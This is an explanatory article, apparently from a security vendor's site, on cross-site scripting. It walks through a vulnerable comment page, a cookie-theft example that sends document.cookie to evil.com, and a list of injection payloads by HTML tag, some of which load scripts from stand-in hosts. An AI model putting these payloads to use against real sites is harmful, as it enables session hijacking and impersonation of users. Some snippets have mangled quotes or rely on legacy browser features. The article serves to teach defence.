---
title: Cross-site Scripting (XSS) Attack
author: Arsen A. Gutsal
layout: text-and-images
---

**Cross-site Scripting (XSS) Attack**
=====================================

Cross-site Scripting (XSS) refers to client-side code injection attack
wherein an attacker can execute malicious scripts (also commonly
referred to as a malicious payload) into a legitimate website or web
application. XSS is amongst the most rampant of web application
vulnerabilities and occurs when a web application makes use of
unvalidated or unencoded user input within the output it generates.

By leveraging XSS, an attacker does not target a victim directly.
Instead, an attacker would exploit a vulnerability within a website or
web application that the victim would visit, essentially using the
vulnerable website as a vehicle to deliver a malicious script to the
victim’s browser.

While XSS can be taken advantage of within VBScript, ActiveX and Flash
(although now considered legacy or even obsolete), unquestionably, the
most widely abused is JavaScript – primarily because JavaScript is
fundamental to most browsing experiences.

**How Cross-site Scripting works**
----------------------------------

In order to run malicious JavaScript code in a victim’s browser, an
attacker must first find a way to inject a payload into a web page that
the victim visits. Of course, an attacker could use social engineering
techniques to convince a user to visit a vulnerable page with an
injected JavaScript payload.

In order for an XSS attack to take place the vulnerable website needs to
directly include user input in its pages. An attacker can then insert a
string that will be used within the web page and treated as code by the
victim’s browser.

The following server-side pseudo-code is used to display the most recent
comment on a web page.

	print "<html>"
	print "<h1>Most recent comment</h1>"
	print database.latestComment
	print "</html>"

The above script is simply printing out the latest comment from a
comments database and printing the contents out to an HTML page,
assuming that the comment printed out only consists of text.

The above page is vulnerable to XSS because an attacker could submit a
comment that contains a malicious payload such as
&lt;script&gt;doSomethingEvil();&lt;/script&gt;.

Users visiting the web page will get served the following HTML page.

      <html>
      <h1>Most recent comment</h1>
      <script>doSomethingEvil();</script>
      </html>

When the page loads in the victim’s browser, the attacker’s malicious
script will execute, most often without the user realizing or being able
to prevent such an attack.

**Important Note** — An XSS vulnerability can only exist if the payload
(malicious script) that the attacker inserts ultimately get parsed (as
HTML in this case) in the victim’s browser

**What’s the worst an attacker can do with JavaScript?**
--------------------------------------------------------

The consequences of what an attacker can do with the ability to execute
JavaScript on a web page may not immediately stand out, especially since
browsers run JavaScript in a very tightly controlled environment and
that JavaScript has limited access to the user’s operating system and
the user’s files.

However, when considering that JavaScript has access to the following,
it’s easier to understand how creative attackers can get with
JavaScript.

-   Malicious JavaScript has access to all the same objects the rest of
     the web page has, including access to cookies. Cookies are often
     used to store session tokens, if an attacker can obtain a user’s
     session cookie, they can impersonate that user.

-   JavaScript can read and make arbitrary modifications to the
     browser’s DOM (within the page that JavaScript is running).

-   JavaScript can use XMLHttpRequest to send HTTP requests with
     arbitrary content to arbitrary destinations.

-   JavaScript in modern browsers can leverage HTML5 APIs such as
     accessing a user’s geolocation, webcam, microphone and even the
     specific files from the user’s file system. While most of these
     APIs require user opt-in, XSS in conjunction with some clever
     social engineering can bring an attacker a long way.

The above, in combination with social engineering, allow attackers to
pull off advanced attacks including cookie theft, keylogging, phishing
and identity theft. Critically, XSS vulnerabilities provide the perfect
ground for attackers to escalate attacks to more serious ones.

**“Isn’t Cross-site scripting the user’s problem?”**
----------------------------------------------------

If an attacker can abuse a XSS vulnerability on a web page to execute
arbitrary JavaScript in a visitor’s browser, the security of that
website or web application and its users has been compromised — XSS is
not the user’s problem, like any other security vulnerability, if it’s
affecting your users, it will affect you.

**The anatomy of a Cross-site Scripting attack**
------------------------------------------------

An XSS attack needs three actors — **the website**, **the victim** and
**the attacker**.

In the example below, it shall be assumed that the attacker’s goal is to
impersonate the victim by stealing the victim’s cookie. Sending the
cookie to a server the attacker controls can be achieved in a variety of
ways, one of which is for the attacker to execute the following
JavaScript code in the victim’s browser through an XSS vulnerability.

	   <script>
	   window.location=“http://evil.com/?cookie=” + document.cookie
	   </script>

The figure below illustrates a step-by-step walkthrough of a simple XSS
attack.

![](/media/website-security/cross-site-scripting.md-images/media/image01.png)

1.  The attacker injects a payload in the website’s database by
    > submitting a vulnerable form with some malicious JavaScript

2.  The victim requests the web page from the website

3.  The website serves the victim’s browser the page with the attacker’s
    > payload as part of the HTML body.

4.  The victim’s browser will execute the malicious script inside the
    > HTML body. In this case it would send the victim’s cookie to the
    > attacker’s server. The attacker now simply needs to extract the
    > victim’s cookie when the HTTP request arrives to the server, after
    > which the attacker can use the victim’s stolen cookie
    > for impersonation.

**Some examples of Cross-site Scripting attack vectors**
--------------------------------------------------------

The following is a non-exhaustive list of XSS attack vectors that an
attacker could use to compromise the security of a website or web
application through an XSS attack. A more extensive list of XSS payload
examples is
maintained[here](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet).

### **&lt;script&gt; tag**

The &lt;script&gt; tag is the most straight-forward XSS payload. A
script tag can either reference external JavaScript code, or embed the
code within the script tag.

     <!-- External script -->*
     <script src=http://evil.com/xss.js></script>
     <!-- Embedded script -->
     <script> alert("XSS"); </script>

### **&lt;body&gt; tag**

An XSS payload can be delivered inside &lt;body&gt; tag by using the
onload attribute or other more obscure attributes such as the background
attribute.

	<!-- onload attribute -->
	<body onload=alert("XSS")>
	<!-- background attribute -->
	<body background="javascript:alert("XSS")">

### **&lt;img&gt; tag**

Some browsers will execute JavaScript when found in the &lt;img&gt;.

     <!-- <img> tag XSS -->
     <img src="javascript:alert("XSS");">
     <!-- tag XSS using lesser-known attributes -->
     <img dynsrc="javascript:alert('XSS')">
     <img lowsrc="javascript:alert('XSS')">

### **&lt;iframe&gt; tag**

The &lt;iframe&gt; tag allows the embedding of another HTML page into
the parent page. An IFrame can contain JavaScript, however, it’s
important to note that the JavaScript in the iFrame does not have access
to the DOM of the parent’s page do to the browser’s Content Security
Policy (CSP). However, IFrames are still very effective means of pulling
off phising attacks.

    <!-- <iframe> tag XSS -->
    <iframe src=”http://evil.com/xss.html”>

### **&lt;input&gt; tag**

In some browsers, if the type attribute of the &lt;input&gt; tag is set
to image, it can be manipulated to embed a script.

```
	<!-- <input> tag XSS -->
	<input type="image" src="javascript:alert('XSS');">
```

### **&lt;link&gt; tag**

The &lt;link&gt; tag, which is often used to link to external style
sheets could contain a script.

       <!-- <link> tag XSS -->	
       <link rel="stylesheet" href="javascript:alert('XSS');">

### **&lt;table&gt; tag**

The background attribute of the table and td tags can be exploited to
refer to a script instead of an image.

      <!-- <table> tag XSS -->
      <table background="javascript:alert('XSS')">
      <!-- <td> tag XSS -->
      <td background="javascript:alert('XSS')">

### **&lt;div&gt; tag**

The &lt;div&gt; tag, similar to the &lt;table&gt; and &lt;td&gt; tags
can also specify a background and therefore embed a script.

```
    <!-- <div> tag XSS -->
    <div style="background-image: url(javascript:alert('XSS'))">
    <!-- <div> tag XSS -->
    <div style="width: expression(alert('XSS'));">
```

### **&lt;object&gt; tag**

The &lt;object&gt; tag can be used to include in a script from an
external site.

	 <!-- <object> tag XSS -->
	 <object type="text/x-scriptlet" data="http://hacker.com/xss.html">

**Is your website or web application vulnerable to Cross-site Scripting?**
--------------------------------------------------------------------------

XSS vulnerabilities are amongst the most widespread web application
vulnerabilities on the Internet. Fortunately, it’s easy to test if your
website or web application is vulnerable to XSS and other
vulnerabilities by running an automated web vulnerability scan using
SOFTSKY Vulnerability Scanner.
[Download](http://www.softsky.com.ua/vulnerability-scanner/download/) the
14-day free on-premise trial, or
[register](http://www.softsky.com.ua/vulnerability-scanner/register-online-vulnerability-scanner/)
to our online service to run a scan against your website or web
application.

#### **Further reading**

-   [Types of XSS](http://www.softsky.com.ua/websitesecurity/xss/)

-   [A comprehensive tutorial on Cross-site Scripting](http://excess-xss.com/)

-   [XSS Prevention Cheat Sheet](http://bit.ly/2cIPoT9)


